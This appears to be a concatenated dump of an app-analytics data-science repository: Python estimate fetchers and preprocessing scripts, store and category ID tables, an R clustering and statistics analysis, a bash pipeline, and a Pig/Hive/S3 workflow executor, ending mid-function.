df = df.drop(['Market', 'Type'], axis=1)
df.rename(columns=columns_dict, inplace=True)
return df
class ScriptEstFetcher(object):
"""Base class for all script based est fetcher.
"""
@classmethod
def fetch_to_dir(cls, save_dir, stores, units_types, daterange, type):
"""
Arguments:
- `save_dir`: the dir to save the results.
- `stores`: A list of stores to fetch.
- `units_types`: A list of unit_types to fetch.
- `daterange`: A 2-element list containing the start and the end date (inclusive).
- `type`: Type of estimation, monthly, weekly, daily
"""
dtstart, dtend = daterange
feeds = itertools.chain(*[cls.unit_to_feeds[u] for u in units_types])
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
use_report = False
for (store, feed) in itertools.product(stores, feeds):
#for store in stores:
if use_report:
if type=='monthly':
report = _load_country_report(store, dts_daily[0], type, 'ios', 'Konami')
elif type == 'weekly':
df = None
dfs = []
df = _load_country_report(store, dts_daily[0], type, 'ios', 'Konami')
for dt in dts_daily:
year, month, day = dt.split('-')
date = datetime.date(int(year), int(month), int(day))
if date.weekday() == 6:
df = _load_country_report(store, dt, type, 'ios', 'Konami')
dfs.append(utilities_pandas.add_date_column(df.copy(), dt))
report = pd.concat(dfs)
#for feed in feeds:
if True:
dfs = Parallel(n_jobs=8)(delayed(_run_fetch_script)(cls.script_path, store, feed, dt, dtstart, type)
for dt in dts_daily)
df = pd.concat(dfs)
csv_filename = os.path.join(save_dir, "%s_%s_%s--%s.csv" % (store, feed,
dts_daily[0],
dts_daily[-1]))
df = ScriptEstFetcher._add_meta_info(df, feed)
if use_report:
if type =='monthly':
df = df.merge(report, on=['app_id', 'feed_id'], how='left')
                    df['estimate'] = df['estimate_y'].fillna(df['estimate_x'])  # prefer the report estimate where present
df = df.drop(['estimate_x', 'estimate_y'], axis=1)
elif type=='weekly':
df = df.merge(report, on=['app_id', 'feed_id', 'date'], how='left')
                    df['estimate'] = df['estimate_y'].fillna(df['estimate_x'])  # prefer the report estimate where present
df = df.drop(['estimate_x', 'estimate_y'], axis=1)
df.to_csv(csv_filename, index=False)
@staticmethod
def _add_meta_info(df, feed):
df['feed_id'] = feed
return df
def _fetch_est_from_db(sql, store, feed, dt):
    # The SQL templates below substitute the date first, then store_id and feed_id.
    sql = sql % (dt, store, feed)
    # Assumption: psql connection settings (host, database, user) come from the environment.
    cmd = 'echo "%s" | psql' % sql
    status, stdout = commands.getstatusoutput(cmd)
    if status is None or status >= 2:
        raise Exception("Have problem fetching estimation from production DB.")
    return utilities_pandas.convert_str_to_df(stdout)
class WebUIDBEstFetcher(object):
"""Getting data from production DB.
"""
@classmethod
def fetch_to_dir(cls, save_dir, stores, units_types, daterange):
dtstart, dtend = daterange
feeds = itertools.chain(*[cls.unit_to_feeds[u] for u in units_types])
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
for (store, feed) in itertools.product(stores, feeds):
            dfs = Parallel(n_jobs=8)(delayed(_fetch_est_from_db)(cls.sql, store, feed, dt)
for dt in dts_daily)
df = pd.concat(dfs)
csv_filename = os.path.join(save_dir, "%s_%s_%s--%s.csv" % (store, feed,
dts_daily[0],
dts_daily[-1]))
df = ScriptEstFetcher._add_meta_info(df, feed)
df.to_csv(csv_filename, index=False)
class IosWebUIEstFetcher(WebUIDBEstFetcher):
sql = "set search_path=ios;\n" \
"COPY (SELECT store_id, feed_id, app_id, category_id, estimate " \
"FROM store_app_daily_list l, " \
"store_app_daily_estimate e" \
"WHERE l.id = e.list_id and date = '%s' and store_id=%s and feed_id=%s) TO STDOUT with CSV HEADER"
class AndroidWebUIEstFetcher(WebUIDBEstFetcher):
sql = "set search_path=android;\n" \
"COPY (SELECT store_id, feed_id, class as app_id, category_id, estimate " \
"FROM store_app_daily_list l, " \
"store_app_daily_estimate e, app_id_map m " \
"WHERE l.id = e.list_id and date = '%s' and app_id = m.id and store_id=%s and feed_id=%s) TO STDOUT with CSV HEADER"
class IosEstFetcher(ScriptEstFetcher):
"""Sorry for the sad name "Ios", but it's better to normalize things.
"""
unit_to_feeds = stores_dict.ios['unit_to_feeds']
script_path = 'external/est_ios.py'
class AndroidEstFetcher(ScriptEstFetcher):
unit_to_feeds = stores_dict.android['unit_to_feeds']
script_path = 'external/est_android.py'
@classmethod
def fetch_to_dir(cls, save_dir, stores, units_types, daterange, type):
"""
Add a special rule for dealing with China's data.
Because in China's we only have feed 0
"""
dtstart, dtend = daterange
feeds = itertools.chain(*[cls.unit_to_feeds[u] for u in units_types])
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
for (store, feed) in itertools.product(stores, feeds):
if store == '3' and feed != 0:
continue
dfs = Parallel(n_jobs=8)(delayed(_run_fetch_script)(cls.script_path, store, feed, dt, dtstart, type)
for dt in dts_daily)
df = pd.concat(dfs)
csv_filename = os.path.join(save_dir, "%s_%s_%s--%s.csv" % (store, feed,
dts_daily[0],
dts_daily[-1]))
df = ScriptEstFetcher._add_meta_info(df, feed)
df.to_csv(csv_filename, index=False)
<file_sep>/financial-product-benchmark/automated-QA/constants.py
STORES_DICT_IOS = {
143441: u'US',
143444: u'GB',
143446: u'BE',
143452: u'NL',
143462: u'JP',
143463: u'HK',
143465: u'CN'}
CATEGORIES_DICT_IOS = {
36: u'Overall',
100: u'Applications',
6000: u'Business',
6001: u'Weather',
6002: u'Utilities',
6003: u'Travel',
6004: u'Sports',
6005: u'Social Networking',
6006: u'Reference',
6007: u'Productivity',
6008: u'Photo and Video',
6009: u'News',
6010: u'Navigation',
6011: u'Music',
6012: u'Lifestyle',
6013: u'Health and Fitness',
6014: u'Games',
6015: u'Finance',
6016: u'Entertainment',
6017: u'Education',
6018: u'Books',
6020: u'Medical',
6021: u'Newsstand',
6022: u'Catalogs',
6023: u'Food and Drink',
7001: u'Games Action',
7002: u'Games Adventure',
7003: u'Games Arcade',
7004: u'Games Board',
7005: u'Games Card',
7006: u'Games Casino',
7007: u'Games Dice',
7008: u'Games Education',
7009: u'Games Family',
7010: u'Games Kids',
7011: u'Games Music',
7012: u'Games Puzzle',
7013: u'Games Racing',
7014: u'Games Role Playing',
7015: u'Games Simulation',
7016: u'Games Sports',
7017: u'Games Strategy',
7018: u'Games Trivia',
7019: u'Games Word',
360: u'Kids',
361: u'Kids 5 & Under',
362: u'Kids Ages 6-8',
363: u'Kids Ages 9-11',
}
FEEDS_DICT_IOS = {
    0: 'iphone_free',
    1: 'iphone_paid',
    2: 'iphone_revenue',
    100: 'ipad_paid',
    101: 'ipad_free',
    102: 'ipad_revenue'}
STORES_DICT_ANDRIOD = {
3: u'CN',
7: u'GB',
9: u'JP',
10: u'US',
11: u'BE',
16: u'HK',
23: u'NL'}
FEEDS_DICT_ANDRIOD = {
    0: 'free',
    1: 'paid',
    2: 'grossing'}
CATEGORIES_DICT_ANDROID = {
1: u'Overall',
2: u'Games',
3: u'Games Arcade & Action',
4: u'Games Brain & Puzzle',
5: u'Games Cards & Casino',
6: u'Games Casual',
7: u'Games Live Wallpaper',
8: u'Games Racing',
9: u'Games Sports',
10: u'Games Widgets',
11: u'Applications',
12: u'Books & Reference',
13: u'Business',
14: u'Comics',
15: u'Communication',
16: u'Education',
17: u'Entertainment',
18: u'Finance',
19: u'Health & Fitness',
20: u'Libraries & Demo',
21: u'Lifestyle',
22: u'Apps Live Wallpaper',
23: u'Media & Video',
24: u'Medical',
25: u'Music & Audio',
26: u'News & Magazines',
27: u'Personalization',
28: u'Photography',
29: u'Productivity',
30: u'Shopping',
31: u'Social',
32: u'Sports',
33: u'Tools',
34: u'Transportation',
35: u'Travel & Local',
36: u'Weather',
37: u'App Widgets',
38: u'Games Action',
39: u'Games Adventure',
40: u'Games Word',
41: u'Games Arcade',
42: u'Games Board',
43: u'Games Card',
44: u'Games Casino',
46: u'Games Educational',
47: u'Games Family',
48: u'Games Music',
49: u'Games Puzzle',
51: u'Games Role Playing',
52: u'Games Simulation',
54: u'Games Strategy',
55: u'Games Trivia',
}
<file_sep>/candidates_test/generate_data.py
'''
Created on May 17, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
def flag_universals(df):
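    # An app appearing in both the iPhone (feed 0) and iPad (feed 101) free lists
    # on the same day ends up with universal = 1; otherwise universal = 0.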
free = df[(df['feed_id']==0) | (df['feed_id']==101)]
#paid = df[(df['feed_id']==1) | (df['feed_id']==100)]
free = free.groupby(['date', 'app_id', 'category_id']).size().reset_index()
#paid = paid.groupby(['date', 'app_id', 'category_id']).size().reset_index()
#df = pd.concat([free, paid])
df = free
df.rename(columns={0:'universal'}, inplace=True)
df['universal'] = df['universal']-1
df = df[['date', 'app_id', 'universal']].drop_duplicates()
return df
if __name__ == '__main__':
f_actuals = '/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/real_daily_raw/143441_Downloads_2013-02-01--2013-02-28.csv'
f_ranks = ['/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/est_daily_raw/143441_0_2013-02-01--2013-02-28.csv',
'/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/est_daily_raw/143441_101_2013-02-01--2013-02-28.csv']
#'/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/est_daily_raw/143441_100_2013-02-01--2013-02-28.csv',
#'/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/est_daily_raw/143441_101_2013-02-01--2013-02-28.csv']
actuals = pd.read_csv(f_actuals)
ranks = map(pd.read_csv, f_ranks)
ranks = pd.concat(ranks)
ranks = ranks.drop('estimate', axis=1)
ranks = ranks[ranks['category_id']==36]
universals = flag_universals(ranks)
df = ranks.merge(actuals, on=['date', 'app_id'], how='left')
df = df.merge(universals, on=['date', 'app_id'], how='left')
df = df[df['feed_id']==0]
df = df.drop(['category_id', 'feed_id'], axis=1).drop_duplicates()
app_ids = df[['app_id']].drop_duplicates().reset_index().reset_index().drop('index', axis=1)
dates = df[['date']].drop_duplicates().reset_index().reset_index().drop('index', axis=1)
df = df.merge(app_ids, on='app_id').drop('app_id', axis=1).rename(columns={'level_0':'app_id'})
df = df.merge(dates, on='date').drop('date', axis=1).rename(columns={'level_0':'date'})
df['date'] = df['date']+1
df = df.drop_duplicates()
df = df.sort(['date', 'rank'])
df.to_csv('data.csv', index=False)
<file_sep>/evaluation/py/get_app_daily_weights.py
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
import numpy as np
from joblib import Parallel, delayed
# This step is time-consuming and we parallelize
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
Parallel(n_jobs=4)(delayed(_run)(f, input_dir, output_dir)
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)))
def _run(f, input_dir, output_dir):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
apps_daily_weights = _get_daily_weights(df)
#merged_info = apps_daily_weights.merge(df, how='inner', on=['app_id', 'date'])
apps_daily_weights.to_csv(os.path.join(output_dir, f), index=False)
# apps_median.to_csv(os.path.join(output_dir, f), index=False)
def _get_daily_weights(df):
def calculate_weight(x):
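        # Piecewise weight by best daily rank: top 20 -> 1.0, ranks 21-200 -> 0.5, 201+ -> 0.1.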
if x<21:
return 1
elif x<201:
return 0.5
else:
return 0.1
grouped = df.groupby(['date', 'app_id'])['rank'].min()
agg = grouped.reset_index()
agg = agg[['app_id', 'date', 'rank']]
agg = agg.drop_duplicates()
agg['daily_weights'] = agg['rank'].apply(calculate_weight)
agg = agg.drop(['rank'], axis=1)
    # (app_id, date) pairs are already unique at this point, so no further grouping is needed.
    #max_ranks = agg.groupby('app_id').aggregate({'max_rank': lambda x: ','.join(x)})
    return agg
if __name__ == '__main__':
main()
<file_sep>/evaluation/py/concat_feeds.py
"""
Aggregate different feeds
"""
# Author: <NAME> <<EMAIL>>
import pandas as pd
import numpy as np
from internal.feeds_groupby_and_apply import feeds_groupby_and_apply
def main():
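    # feeds_groupby_and_apply(pd.concat) builds a runner that concatenates the per-feed frames.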
feeds_groupby_and_apply(pd.concat)()
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/hive_scripts/workflow/conf/rq_settings_example.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
QUEUES = ['workflow']<file_sep>/google-analytics/r_codes/Cross-Check.R
library(xlsx)
library(lda)
library(fpc)
library(cluster)
library(VennDiagram)
MDM = read.xlsx2(file = './data/2015-06-30 us reporters.xlsx', sheetIndex = 1)
GA = read.delim2(file = './data/all_ga_apps.tsv', sep = '\t', header = F, as.is = T,
                 col.names = c('app_id', 'app_name', 'platform'))
iTC = read.xlsx2(file = './data/PROD - FREE - iTC Analytics Usage Benchmarking Data.xlsx', sheetIndex = 4)
GA = unique(GA)
temp = read.csv('~/Downloads/App_Annie_Usage_Intelligence_Top_Usage_iPhone_United States_Overall_2015-06-01_2015-06-30.csv')
# intersection
merged1 = merge(x = MDM, y = GA, by.x = 'package.id', by.y = 'app_id', all = F)
merged2 = merge(x = MDM, y = iTC, by.x = 'package.id', by.y = 'App.ID', all = F)
merged3 = merge(x = GA, y = iTC, by.x = 'app_id', by.y = 'App.ID', all = F)
penetration_diff = as.numeric(as.character(merged2$penetration)) - as.numeric(as.character(merged2$Usage.Penetration))
penetration_pct_diff = (as.numeric(as.character(merged2$penetration)) - as.numeric(as.character(merged2$Usage.Penetration))) / as.numeric(as.character(merged2$penetration))
hist(penetration_diff, breaks = 200, col = 'blue')
quantile(penetration_diff, probs = seq(0, 1, 0.2) )
hist(penetration_pct_diff, breaks = 200, col = 'blue')
quantile(penetration_pct_diff, probs = seq(0, 1, 0.2) )
merged4 = merge(merged1, merged2, by = 'package.id', all = F)
##################################################################################
# Usage data - top 1500 apps
# My Data Manager data for IOS and Android and US only
android = read.csv('./data/App_Annie_Usage_Intelligence_Top_Usage_Android_United States_Overall_2015-06-01_2015-06-30 (1).csv')
ios = read.csv('./data/App_Annie_Usage_Intelligence_Top_Usage_iOS_United States_Overall_2015-06-01_2015-06-30 (2).csv')
temp = android[!duplicated(android$App.ID),c(1,8)]
temp_1 = ios[!duplicated(ios$App.ID),c(1,8)]
merged_android = merge(x = android, y = GA, by.x = 'App.ID', by.y = 'app_id', all = F)
merged_ios = merge(x = ios, y = GA, by.x = 'App.ID', by.y = 'app_id', all = F)
merged_android = merge(x = android, y = MDM, by.x = 'App.ID', by.y = 'package.id', all = F)
merged_ios = merge(x = ios, y = MDM, by.x = 'App.ID', by.y = 'package.id', all = F)
temp = merged_android[!duplicated(merged_android$App.ID),c(1,8)]
temp_1 = merged_ios[!duplicated(merged_ios$App.ID),c(1,8)]
# Convert percent to numeric
hist(as.numeric(sub('%', '', android$Usage.Penetration))/100, breaks = 100)
hist(as.numeric(sub('%', '', ios$Install.Penetration))/100, breaks = 100)
hist(as.numeric(sub('%', '', ios$Usage.Penetration))/100, breaks = 100)
quantile(as.numeric(sub('%', '', ios$Install.Penetration))/100, probs = seq(0.1, 1, 0.1))
quantile(as.numeric(sub('%', '', ios$Usage.Penetration))/100, probs = seq(0.1, 1, 0.1))
View(merged_ios[,c(1,2,3,5,7,8,16)])
merged_android = merge(x = android, y = MDM, by.x = 'App.ID', by.y = 'package.id', all = F)
merged_ios = merge(x = ios, y = MDM, by.x = 'App.ID', by.y = 'package.id', all = F)
# What is X..Active.Day -- percentage of the active days in a month
hist(as.numeric(sub('%', '', android$X..Active.Days)) / android$Avg.Active.Days)
##################################################################################
# Venn Visualization
grid.newpage()
draw.single.venn(22, category = 'Google Analytics', lty='blank',
fill='cornflower blue', alpha = 0.5)
grid.newpage()
draw.pairwise.venn(area1 = 22, area2 = 10, cross.area = 5,
category = c('Google Analytics', 'MDM'),
lty='blank', fill= c('cornflower blue', 'pink'), alpha = rep(0.5, 2))
grid.newpage()
draw.triple.venn(area1 = 5374, area2 = 25755, area3 = 916, n12 = 124, n23 = 876, n13 = 17, n123 = 15,
category = c('Google Analytics', 'MDM', 'iTC'),
lty='blank', fill= c('light blue', 'pink', 'orange'), alpha = rep(0.6, 3))
# New GA pull and Full MyDM
grid.newpage()
draw.pairwise.venn(area1 = 4519, area2 = 4712, cross.area = 3945,
category = c('Old\nGoogle Analytics', 'New\nGoogle Analytics'),
lty='blank', fill= c('light blue', 'pink'), alpha = rep(0.6, 2), cex=2, cat.cex = rep(1.5,1.5))
grid.newpage()
draw.triple.venn(area1 = 4519, area2 = 4712, area3 = 47196, n12 = 3945, n23 = 443, n13 = 450, n123 = 372,
category = c('Old Google Analytics', 'New Google Analytics', 'MyDM'),
lty='blank', fill= c('light blue', 'pink', 'orange'), alpha = rep(0.6, 3))
temp = summary(as.factor(GA$platform))
temp1 = summary(as.factor(MDM$platform))
pie(x = temp, labels = c('Android', 'iOS'), col=c('peachpuff', 'light green'), main = 'Google Analytics', radius = 1.0)
pie(x = temp1, labels = c('Android', 'iOS'), col=c('pink', 'light blue'), main = 'MDM', radius = 1 )
##################################################################################
# Statistical test
# t-test
t.test(x = as.numeric(sub(pattern = '%', '', x = ios$Usage.Penetration))/100.0,
y = as.numeric(sub(pattern = '%', '', x = android$Usage.Penetration))/100.0 )
# ANOVA
temp_all = rbind(ios[1:16], android[1:16])
temp_all$Usage.Penetration = as.numeric(sub(pattern = '%', '', x = temp_all$Usage.Penetration) ) / 100.0
# one-way
summary(aov(Usage.Penetration ~ Device, data=temp_all))
# two-way
summary(aov(Usage.Penetration ~ Store + Device, data=temp_all))
# ios Device
ios$Usage.Penetration = as.numeric(sub(pattern = '%', '', x = ios$Usage.Penetration) ) / 100.0
summary(aov(Usage.Penetration ~ Device, data=ios))
# android Device
android$Usage.Penetration = as.numeric(sub(pattern = '%', '', x = android$Usage.Penetration) ) / 100.0
summary(aov(Usage.Penetration ~ Device, data=android[android$Device!='Phone + Tablet',]))
t.test(android[android$Device=='Phone + Tablet',]$Usage.Penetration, android[android$Device=='Phone',]$Usage.Penetration)
##################################################################################
# 1. time since release
# 2. category of apps
# 3. Usage Penetration --- inverse relation of Panel size
# 4. Error Estimation --- active user selection criterias
# check correlation estimate between Usage Intelligence and GA
convertor = function(data)
{
data$Usage.Penetration = as.numeric(sub('%', '', data$Usage.Penetration)) / 100
for(name in colnames(data))
{
if(name != 'Usage.Penetration')
{
data[,name] = as.numeric(as.character(data[,name]))
}
}
return(data)
}
colnames(android)
feature_names = c("Usage.Penetration", "Avg.Active.Days", "Avg.MB...Session")
# convert to numeric
numeric_matrix = convertor(android[feature_names])
summary(numeric_matrix)
# remove NAs
for (i in 1:ncol(numeric_matrix) )
{
numeric_matrix[is.na(numeric_matrix[,i]),i] = mean(numeric_matrix[,i], na.rm = T)
}
summary(numeric_matrix)
# scaling
numeric_matrix = scale(numeric_matrix, center = F)
hist(numeric_matrix[,2], breaks = 100, xlab = 'Number of Days', main = 'Distribution of Avg.Active.Day', col='blue')
# log transformation
numeric_matrix = log(numeric_matrix)
# distribution
hist(numeric_matrix[,2], breaks = 100, xlab = 'Transformed Number of Days', main = 'Transformed Distribution of Avg.Active.Day', col = 'blue')
####################################################################################
# elbow to find the # of centroid
# kmean - silhouette score and euclidean distance
number_K = 15
# classic elbow setup: total within-cluster sum of squares for k = 1
wss = (nrow(numeric_matrix) - 1) * sum(apply(numeric_matrix, 2, var))
km = numeric(number_K)
for (i in 2:number_K)
{
centroid = kmeans(numeric_matrix, centers = i)
wss[i] = sum(centroid$withinss)
sil2 = summary(silhouette(centroid$cluster, daisy(numeric_matrix) ))
km[i] = sil2$avg.width
}
plot(1:number_K, wss, type = 'b', xlab = 'Number of Clusters', ylab = 'sum of Euclid distance')
k.best = which.max(km)
print('K-means method:')
cat('number of clusters with optimum average silhouette score:', k.best, '\n')
plot(1:number_K, km, col='red', cex=2, pch=20, ylim = range(0.1,0.4), ylab = 'silhouette score', xlab = 'K', main='K-Mean')
# k-medoid method - silhouette score
asw = numeric(number_K)
for (i in 2:number_K)
{
obj = pam(numeric_matrix, k = i)
asw[[i]] = obj$silinfo$avg.width
#plot(obj)
}
k.best = which.max(asw)
print('k-medoid separation method:')
cat('number of clusters with optimum average silhouette score:', k.best, '\n')
plot(1:number_K, asw, col='green', cex=2, pch=20, ylab = 'silhouette score', xlab = 'K')
# hierarchical clustering
sil = numeric(number_K)
d = dist(numeric_matrix, method = 'euclidean')
hcl = hclust(d, method = 'ward.D' )
#plot(hcl)
for (i in 2:number_K)
{
groups = cutree(hcl, k = i)
#rect.hclust(hcl, k = i, border = 'red')
si = summary( silhouette(groups, daisy(numeric_matrix)) )
sil[i] = si$avg.width
#plot(si, nmax=200, cex.names = 1)
}
k.best = which.max(sil)
print('Hierarchical clustering:')
cat('number of clusters with optimum average silhouette score:', k.best, '\n')
plot(1:number_K, sil, col='blue', cex=2, pch=20, ylim = range(0.1,0.4), ylab = 'silhouette score', xlab = 'K', main = 'Hierarchical Clustering')
####################################################################################
# validation
N = length(groups)
#groups = cutree(hcl, k = 3)
groups = kmeans(numeric_matrix, centers = 3)$cluster
summary(as.factor(groups))
summary(as.factor(android$Device))
dev = c( 'Phone','Phone+Tablet', 'Tablet')
sum = 0
for (i in 1:20)
{
cat(as.character(android$Device[i]), dev[groups[i]], '\n')
sum = sum + (as.character(android$Device[i]) == dev[groups[i]])
}
print(sum/N)
<file_sep>/old_investigations/internal/concat_by_daterange.py
"""
Concat date by the date range given.
"""
# Author: <NAME> <<EMAIL>>
import os.path
from dateutil import rrule
from internal import stores_dict
import pandas as pd
MONTHLY_CACHE_DIR = './cache/monthly'
def concat_by_daterange(dtstart, dtend, opts):
for store in opts.stores:
for units_type in opts.units_types:
print("%s %s" % (stores_dict.query_country(store), units_type))
outfile = "./data/%s_%s--%s_%s.csv" % (stores_dict.query_country(store),
dtstart.date(),
dtstart.date(),
units_type)
if not opts.overwrite and os.path.exists(outfile):
print ("Cache exists. Use cached version. %s" % outfile)
else:
                df = _do_concat(store, units_type, dtstart, dtend)
                df.to_csv(outfile)
def _do_concat(store, units_type, dtstart, dtend):
months = rrule.rrule(rrule.MONTHLY, dtstart=dtstart, until=dtend)
stacked_df = []
print "Selecting from %s to %s (inclusive)" % (dtstart.date(), dtend.date())
# Select from monthly cache for data that is in the daterange.
for m in months:
data_monthly = _fetch_monthly_cache(store, units_type, m)
data_range = _select_data_in_range(data_monthly, dtstart, dtend)
stacked_df.append(data_range)
return pd.concat(stacked_df, axis=0)
def _fetch_monthly_cache(store, units_type, m):
year = '%d' % m.year
month = '%.2d' % m.month
country = stores_dict.query_country(store)
filename = '%s_%s-%s_%s.csv' % (country, year, month, units_type)
return pd.read_csv(os.path.join(MONTHLY_CACHE_DIR, filename))
def _select_data_in_range(data_monthly, dtstart, dtend):
data_monthly['date'] = data_monthly['date'].astype('datetime64')
data_monthly = data_monthly.sort_index(by='date')
sel = (data_monthly['date'] >= dtstart) & (data_monthly['date'] <= dtend)
return data_monthly.ix[sel]
<file_sep>/old_investigations/android/generate_everything.sh
#!/bin/bash
# This is an example of using various scripts to generate everything
set -e
set -o pipefail
declare -a countries=('United States' 'China' 'Japan' 'South Korea')
declare year=2012
declare month=08
declare month_end=31
# store ids: US=10, China=3, Japan=9, South Korea=27
store_ids="10,3,9,27"
#do clean
if [ -d "cache" ]
then
find cache -size 0 -exec rm '{}' \;
fi
## Prepare the data
python run_fetch_and_concat.py -s $store_ids -d"$year-$month" -u "Downloads,USD"
for ((i=0; i<${#countries[@]}; i++))
do
c=${countries[$i]}
echo "Calculating SDA for ${c}..."
python run_calculate_sda.py -d "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_Downloads.csv" -u "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_USD.csv" -r "Rafael_data_July/${c}/AppAnnie_Estimates.csv"
python run_calculate_sda.py -d "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_Downloads.csv" -u "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_USD.csv"
#echo "Generating Plots..."
#Rscript plot_80_20.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_With_Reference_Aggregated.csv"
#Rscript plot_dist.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_With_Reference_Aggregated.csv"
#Rscript plot_improvement.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_With_Reference_Aggregated.csv"
Rscript plot_80_20.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_dist.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_improvement.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_80_20_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_dist_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_improvement_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_80_20_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_dist_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_improvement_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
echo "Finished, check the ./plots folder"
done
<file_sep>/aa_au_model/hive_scripts/workflow/module/executor.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import os
import sys
import commands
import re
import redis
import happybase
import copy
import itertools
import copy_reg
import types
from importlib import import_module
from multiprocessing import Pool
from happybase.hbase.Hbase import AlreadyExists
from hdfs import HDFSStorage
from s3 import S3Storage
from utils import generate_pig_file, load_schema, STORE_STR_FUNC_MAPPING, parse_s3_str, generate_hive_file
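# Python 2's pickle cannot serialize bound/unbound methods by default, which
# breaks multiprocessing.Pool.apply_async on instance methods (used by
# LoopExecutor below). Registering this reducer pickles a method as
# (getattr, (instance_or_class, method_name)).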
def _pickle_method(m):
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
copy_reg.pickle(types.MethodType, _pickle_method)
class Executor(object):
"""
Executor base class
"""
_script_file_path = None
def __init__(self, script_file_path, t=None, alert_on_fail=False, script_type=None):
self._script_file_path = script_file_path
self.alert_on_fail_flag = alert_on_fail
self.t = t
self._script_type = script_type
@staticmethod
def get_executor(script_type):
if script_type == 'pig':
return PigExecutor
elif script_type.startswith('loop'):
return LoopExecutor
elif script_type == 'shell':
return ShellExecutor
elif script_type == 'python':
return PythonExecutor
elif script_type == 'streaming':
return StreamingExecutor
elif script_type == 'hive':
return HiveExecutor
else:
return None
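    # Typical usage (sketch; the script path and run parameters below are
    # hypothetical, not taken from a real workflow definition):
    #   executor_cls = Executor.get_executor('pig')
    #   executor = executor_cls('jobs/rollup.pig', alert_on_fail=True)
    #   status, output = executor.run(date='2015-05-01')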
def del_s3_zero_file(self, s3_str):
access_key, secret_key, bucket_name, key_name = parse_s3_str(s3_str)
s = S3Storage(access_key, secret_key)
for k in s.list(bucket_name, key_name):
if not k.endswith('_SUCCESS') and s.size(bucket_name, k) == 0:
s.delete(bucket_name, k)
def pre_del_local_data(self, file):
status, output = 0, ''
try:
status, output = commands.getstatusoutput(
'rm -rf %s' % file
)
except Exception as ex:
status, output = -1, str(ex)
return status, output
def pre_del_s3_data(self, s3_str):
status, output = 0, ''
access_key, secret_key, bucket_name, key_name = parse_s3_str(s3_str)
try:
s = S3Storage(access_key, secret_key)
for k in s.list(bucket_name, key_name):
s.delete(bucket_name, k)
except Exception as ex:
status, output = -1, str(ex)
return status, output
def pre_del_hdfs_data(self, file):
status, output = 0, ''
try:
HDFSStorage.delete(file)
except Exception as ex:
status, output = -1, str(ex)
return status, output
def get_master_ip(self, kwargs):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
r = redis.Redis(host=settings.REDIS_HOST, port=settings.REDIS_PORT)
cluster_application_type = kwargs.get('cluster_application_type')
        master_ip = r.get('emr-cluster:%s' % cluster_application_type)
        del kwargs['cluster_application_type']
        return master_ip
def alert_on_fail(self, *args, **kwargs):
if self.alert_on_fail_flag:
daily_mail_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0],
'../../monitoring/daily_mail/daily_mail.py'
)
commands.getstatusoutput(
'python %s --context-class=workflow_alert.WorkFlowAlertContext --params=script_file_name:%s' % (
daily_mail_path, kwargs['script_name']
)
)
def run(self, *args, **kwargs):
raise NotImplementedError()
class PigExecutor(Executor):
"""
Pig executor
"""
def create_hbase_table(self, pig_file_path, pig_file_name):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
whole_path = os.path.join(pig_file_path, pig_file_name + '.pig')
pig_file_str = open(whole_path, 'r').read()
all_schemas = re.findall(r'INTO ###(.+?)###', pig_file_str)
for schema_name in set(all_schemas):
schema = load_schema(schema_name)
if schema['type'] == 'hbase':
conn = happybase.Connection(settings.HBASE_THRIFT_HOST)
cf = dict(
(s[0].split(':')[0], dict())
for s in schema['schema']
)
try:
conn.create_table(schema['table'], cf)
except AlreadyExists:
pass
def run(self, *args, **kwargs):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
mode_str = ''
if self.t or "running_locally" in kwargs:
mode_str = '-x local'
pig_file_path, pig_file_name = self._script_file_path.rsplit('/', 1)
pig_file_name = pig_file_name.replace('.pig', '')
running_file, output_path_list = generate_pig_file(
pig_file_path, pig_file_name, kwargs, self.t
)
if not self.t:
self.create_hbase_table(pig_file_path, pig_file_name)
for f in output_path_list:
for p, v in kwargs.iteritems():
f = f.replace('$%s' % p, str(v))
if self.t:
status, output = commands.getstatusoutput(
